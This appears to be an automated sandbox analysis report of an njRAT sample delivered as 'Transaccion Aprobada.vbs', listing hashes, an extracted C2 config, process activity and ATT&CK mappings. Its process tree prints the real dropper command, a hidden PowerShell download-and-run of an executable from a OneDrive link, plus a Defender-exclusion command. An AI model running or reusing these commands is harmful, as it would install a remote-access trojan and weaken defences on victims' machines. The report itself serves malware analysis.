njrat | 4df37056407ca0353e2357399ec8f2bd7583b6d10fc5d1d4f6744b9415a1ce2f

General

Target

Transaccion Aprobada.vbs
Size

1KB
MD5

45beeab3735b33386dc605d813ab1712
SHA1

9570171eb0875939b3a9fd51710422036ca968a7
SHA256

4df37056407ca0353e2357399ec8f2bd7583b6d10fc5d1d4f6744b9415a1ce2f
SHA512

3b7077d939301d4708a8d41d27bfe0df8e4d703d07af8882e14b02b65dfde303b13f2a428c2911fe3d1eb086e05199bb791562e490ac28092fbd6f520102335e

Score

10^/10

njrat nyan cat suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21130&authkey=AEqY-yNYbKJY9pM

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

reald27.duckdns.org:3525

Mutex

d58e514d83d54f2c

Attributes

reg_key
d58e514d83d54f2c
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

8 5112 powershell.exe
10 5112 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Hostdyn.exeHostdyn.exe

pid process

4364 Hostdyn.exe
4604 Hostdyn.exe

flow	pid	process
8	5112	powershell.exe
10	5112	powershell.exe

pid	process
4364	Hostdyn.exe
4604	Hostdyn.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transaccion Aprobada.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transaccion Aprobada.vbs	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Hostdyn.exe

description pid process target process

PID 4364 set thread context of 4604 4364 Hostdyn.exe Hostdyn.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

5112 powershell.exe
5112 powershell.exe
5112 powershell.exe
4616 powershell.exe
4616 powershell.exe
4616 powershell.exe

description	pid	process	target process
PID 4364 set thread context of 4604	4364	Hostdyn.exe	Hostdyn.exe

pid	process
5112	powershell.exe
5112	powershell.exe
5112	powershell.exe
4616	powershell.exe
4616	powershell.exe
4616	powershell.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

Processes:

powershell.exepowershell.exeHostdyn.exe

description	pid	process
Token: SeDebugPrivilege	5112	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe
Token: 33	4604	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	4604	Hostdyn.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exeHostdyn.exe

description	pid	process	target process
PID 4656 wrote to memory of 5112	4656	WScript.exe	powershell.exe
PID 4656 wrote to memory of 5112	4656	WScript.exe	powershell.exe
PID 5112 wrote to memory of 4364	5112	powershell.exe	Hostdyn.exe
PID 5112 wrote to memory of 4364	5112	powershell.exe	Hostdyn.exe
PID 5112 wrote to memory of 4364	5112	powershell.exe	Hostdyn.exe
PID 4364 wrote to memory of 4616	4364	Hostdyn.exe	powershell.exe
PID 4364 wrote to memory of 4616	4364	Hostdyn.exe	powershell.exe
PID 4364 wrote to memory of 4616	4364	Hostdyn.exe	powershell.exe
PID 4364 wrote to memory of 4604	4364	Hostdyn.exe	Hostdyn.exe
PID 4364 wrote to memory of 4604	4364	Hostdyn.exe	Hostdyn.exe
PID 4364 wrote to memory of 4604	4364	Hostdyn.exe	Hostdyn.exe
PID 4364 wrote to memory of 4604	4364	Hostdyn.exe	Hostdyn.exe
PID 4364 wrote to memory of 4604	4364	Hostdyn.exe	Hostdyn.exe
PID 4364 wrote to memory of 4604	4364	Hostdyn.exe	Hostdyn.exe
PID 4364 wrote to memory of 4604	4364	Hostdyn.exe	Hostdyn.exe
PID 4364 wrote to memory of 4604	4364	Hostdyn.exe	Hostdyn.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Transaccion Aprobada.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21130&authkey=AEqY-yNYbKJY9pM' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5112

C:\Users\Admin\AppData\Roaming\Hostdyn.exe
"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616

C:\Users\Admin\AppData\Roaming\Hostdyn.exe
"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4604

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d75c6d552f39939a489d35979b652995

SHA1
1587fce2bd8bcc66bcfc2c5aaa5a762c15ba3431

SHA256
a6d8d519427ad0bafd4328656c4717b84e7ff281b36b38e6350ad4c188beda5c

SHA512
f32344b99d33e09b8c72390162411121c2cbb4143d80a27f05c777d33a1f919ff3dc36201d0639b903246e9789662f6b05faa4e181b3bebbafc41ab1e426883a

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
c0f47cefd86e4f7001fc2ddb8f3e0c5d

SHA1
2b0fc1b8bad1b638a1798ada05e5c47c5c920cff

SHA256
30657f9922b3a20543bd4de8638cbdba793bcda6ad307e61f3227dce43b705d0

SHA512
55fa81a60bc5db3640cdfd59efcc2ee4d1545462af80722f9eec930ba4223c86a052d921ecf2496f35583801864d75f379a4766718b1ccc114ea95b4d68dc9f0

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
c0f47cefd86e4f7001fc2ddb8f3e0c5d

SHA1
2b0fc1b8bad1b638a1798ada05e5c47c5c920cff

SHA256
30657f9922b3a20543bd4de8638cbdba793bcda6ad307e61f3227dce43b705d0

SHA512
55fa81a60bc5db3640cdfd59efcc2ee4d1545462af80722f9eec930ba4223c86a052d921ecf2496f35583801864d75f379a4766718b1ccc114ea95b4d68dc9f0

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
c0f47cefd86e4f7001fc2ddb8f3e0c5d

SHA1
2b0fc1b8bad1b638a1798ada05e5c47c5c920cff

SHA256
30657f9922b3a20543bd4de8638cbdba793bcda6ad307e61f3227dce43b705d0

SHA512
55fa81a60bc5db3640cdfd59efcc2ee4d1545462af80722f9eec930ba4223c86a052d921ecf2496f35583801864d75f379a4766718b1ccc114ea95b4d68dc9f0

Download Submit
memory/4364-157-0x0000000005E80000-0x0000000005E81000-memory.dmp

Filesize
4KB

Download
memory/4364-151-0x0000000000000000-mapping.dmp

Download
memory/4364-164-0x0000000007700000-0x000000000770A000-memory.dmp

Filesize
40KB

Download
memory/4364-155-0x0000000000F70000-0x0000000000F71000-memory.dmp

Filesize
4KB

Download
memory/4364-158-0x0000000005A20000-0x0000000005A21000-memory.dmp

Filesize
4KB

Download
memory/4364-159-0x00000000059A0000-0x00000000059A1000-memory.dmp

Filesize
4KB

Download
memory/4364-160-0x0000000005980000-0x0000000005E7E000-memory.dmp

Filesize
5.0MB

Download
memory/4364-161-0x0000000005DF0000-0x0000000005E06000-memory.dmp

Filesize
88KB

Download
memory/4364-162-0x0000000007D80000-0x0000000007D81000-memory.dmp

Filesize
4KB

Download
memory/4364-163-0x0000000007D10000-0x0000000007D4F000-memory.dmp

Filesize
252KB

Download
memory/4604-166-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/4604-424-0x00000000050D0000-0x00000000055CE000-memory.dmp

Filesize
5.0MB

Download
memory/4604-167-0x000000000040677E-mapping.dmp

Download
memory/4616-207-0x0000000009CF0000-0x0000000009CF1000-memory.dmp

Filesize
4KB

Download
memory/4616-179-0x0000000007FA0000-0x0000000007FA1000-memory.dmp

Filesize
4KB

Download
memory/4616-177-0x0000000004F50000-0x0000000004F51000-memory.dmp

Filesize
4KB

Download
memory/4616-175-0x0000000004EF0000-0x0000000004EF1000-memory.dmp

Filesize
4KB

Download
memory/4616-402-0x0000000009C90000-0x0000000009C91000-memory.dmp

Filesize
4KB

Download
memory/4616-408-0x0000000009C80000-0x0000000009C81000-memory.dmp

Filesize
4KB

Download
memory/4616-277-0x0000000004F53000-0x0000000004F54000-memory.dmp

Filesize
4KB

Download
memory/4616-165-0x0000000000000000-mapping.dmp

Download
memory/4616-178-0x0000000004F52000-0x0000000004F53000-memory.dmp

Filesize
4KB

Download
memory/4616-176-0x0000000007930000-0x0000000007931000-memory.dmp

Filesize
4KB

Download
memory/4616-180-0x0000000008040000-0x0000000008041000-memory.dmp

Filesize
4KB

Download
memory/4616-181-0x0000000008300000-0x0000000008301000-memory.dmp

Filesize
4KB

Download
memory/4616-182-0x0000000008370000-0x0000000008371000-memory.dmp

Filesize
4KB

Download
memory/4616-276-0x000000007ED80000-0x000000007ED81000-memory.dmp

Filesize
4KB

Download
memory/4616-184-0x00000000082D0000-0x00000000082D1000-memory.dmp

Filesize
4KB

Download
memory/4616-185-0x0000000008B60000-0x0000000008B61000-memory.dmp

Filesize
4KB

Download
memory/4616-186-0x0000000008A10000-0x0000000008A11000-memory.dmp

Filesize
4KB

Download
memory/4616-194-0x00000000097C0000-0x00000000097F3000-memory.dmp

Filesize
204KB

Download
memory/4616-201-0x00000000097A0000-0x00000000097A1000-memory.dmp

Filesize
4KB

Download
memory/4616-206-0x0000000009B30000-0x0000000009B31000-memory.dmp

Filesize
4KB

Download
memory/5112-132-0x00000249CB4B0000-0x00000249CB4B2000-memory.dmp

Filesize
8KB

Download
memory/5112-121-0x00000249CCFE0000-0x00000249CCFE1000-memory.dmp

Filesize
4KB

Download
memory/5112-134-0x00000249CB4B6000-0x00000249CB4B8000-memory.dmp

Filesize
8KB

Download
memory/5112-126-0x00000249E5F60000-0x00000249E5F61000-memory.dmp

Filesize
4KB

Download
memory/5112-115-0x0000000000000000-mapping.dmp

Download
memory/5112-133-0x00000249CB4B3000-0x00000249CB4B5000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads